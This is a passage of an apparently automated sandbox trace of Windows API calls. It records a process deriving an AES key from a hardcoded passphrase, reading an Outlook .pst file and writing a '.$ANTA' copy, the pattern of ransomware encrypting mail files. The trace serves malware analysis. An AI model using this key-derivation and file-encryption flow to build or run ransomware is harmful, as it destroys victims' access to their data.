lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0084.872] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0084.872] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796e88, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0084.872] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a47b0) returned 1 [0084.873] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0084.873] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0084.873] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0084.873] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0084.873] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0084.873] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0084.873] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0084.874] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0084.874] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0084.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0084.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43caac0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0084.874] CryptCreateHash (in: hProv=0x41a47b0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0084.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0084.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e27e8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0084.874] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0084.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0084.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0084.874] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0084.874] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0084.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0084.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cac10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0084.875] CryptHashData (hHash=0x41ac440, pbData=0x17e2ae8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0084.875] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0084.875] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0084.875] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0084.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0084.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cad18, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0084.875] CryptDeriveKey (in: hProv=0x41a47b0, Algid=0x6610, hBaseData=0x41ac440, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41abfc0) returned 1 [0084.875] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0084.875] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0084.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0084.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796d68, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0084.875] CryptDestroyHash (hHash=0x41ac440) returned 1 [0084.875] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst" (normalized: "c:\\users\\fd1hvy\\documents\\outlook files\\kkcie@kdj.kd.pst"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0084.875] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.876] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0084.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0084.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0084.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0084.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0084.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0084.876] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0084.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0084.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0084.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0084.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0084.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0084.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0084.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0084.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0084.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0084.876] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0084.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0084.876] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0084.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0084.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0084.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0084.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0084.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0084.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0084.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0084.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0084.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0084.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0084.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0084.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0084.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0084.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0084.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0084.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0084.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0084.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0084.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0084.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0084.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0084.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0084.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0084.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0084.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0084.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0084.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0084.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0084.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4590 [0084.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0084.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a240 [0084.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0084.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369d18 [0084.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4590 | out: hHeap=0x1780000) returned 1 [0084.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0084.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0084.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0084.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0084.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0084.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a240 | out: hHeap=0x1780000) returned 1 [0084.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0084.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0084.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0084.878] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0084.878] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359a68 [0084.878] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\" (normalized: "c:\\users\\fd1hvy\\documents\\outlook files")) returned 0x10 [0084.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359a68 | out: hHeap=0x1780000) returned 1 [0084.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0084.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369d18 | out: hHeap=0x1780000) returned 1 [0084.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0084.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0084.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0084.878] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0084.878] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x499a008 [0084.878] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0084.878] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0084.878] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\outlook files\\kkcie@kdj.kd.pst.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0084.879] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0084.879] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0084.879] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0084.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0084.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0084.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0084.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0084.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0084.879] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0084.879] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0084.879] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0084.879] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0084.879] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0084.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0084.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0084.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0084.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0084.879] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0084.879] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0084.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0084.880] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0084.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0084.880] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0084.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0084.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0084.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0084.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0084.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0084.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0084.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0084.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0084.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0084.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0084.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0084.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0084.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0084.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0084.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0084.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e03020 [0084.883] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0084.883] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x10000, lpOverlapped=0x0) returned 1 [0085.201] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x10000, lpOverlapped=0x0) returned 1 [0085.376] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x10000, lpOverlapped=0x0) returned 1 [0085.379] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x10000, lpOverlapped=0x0) returned 1 [0085.381] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x2400, lpOverlapped=0x0) returned 1 [0085.381] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0085.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0085.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0085.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0085.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0085.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x42400) returned 0x49aa010 [0085.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e03020 | out: hHeap=0x1780000) returned 1 [0085.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0085.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0085.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0085.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0085.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0085.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x42400) returned 0x48f0048 [0085.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0085.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0085.391] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 1 [0085.391] TranslateMessage (lpMsg=0x144f084) returned 0 [0085.391] DispatchMessageW (lpMsg=0x144f084) returned 0x0 [0085.391] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0085.391] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0085.392] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0085.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0085.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0085.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0085.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0085.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0085.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x42400) returned 0x49aa010 [0085.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0085.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0085.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0085.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0085.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0085.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0085.392] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0085.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0085.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0085.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0085.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0085.392] 